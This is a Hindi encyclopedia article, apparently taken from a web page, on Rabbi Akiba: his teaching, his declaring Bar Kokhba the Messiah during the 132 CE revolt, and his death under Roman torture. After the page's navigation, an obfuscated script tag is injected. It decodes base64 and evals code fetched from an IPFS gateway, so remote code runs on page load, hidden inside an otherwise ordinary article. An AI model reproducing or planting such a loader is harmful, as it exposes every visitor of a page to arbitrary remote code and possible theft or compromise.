अकीबा  

अकीबा (सन 50-132 ई.) फिलस्तीन का यहूदी रब्बी और जाफा के रब्बानो विद्यालय का मुख्य अध्यापक था। कहा जाता है कि उसके 24 हज़ार शिष्य थे, जिनमें रब्बी मेअर प्रमुख था।

  • सन 132 ई. में फिलस्तीन के यहूदियों ने अपने धर्म और अपने अस्तित्व की रक्षा के लिए बहुत प्रयत्न किया। इस संग्राम का नेता बरकोकबा था।
  • धर्माचार्य अकीबा ने बरकोकबा को यहूदियों का मसीहा घोषित कर दिया था।
  • तीन वर्ष के संग्राम के बाद रोमन सेना विजयी हुई और येरुसलम के एक-एक बच्चे का कत्ल कर दिया गया और शहर की समस्त भूमि पर हल चलवाकर उसे बराबर करवा दिया गया।
  • अकीबा को बहुत यातनाएँ दी गईं और उसकी खाल खिंचवा ली गई, किंतु उसने हँसते-हँसते मृत्यु का आलिंगन किया।
  • यहूदी जिन दस शहीदों को अब तक प्रार्थना के समय याद करते हैं, उनमें से एक शहीद अकीबा भी है।[१]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. अकीबा (हिन्दी)। । अभिगमन तिथि: 01 फ़रवरी, 2014।

संबंधित लेख

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=अकीबा&oldid=609610" से लिया गया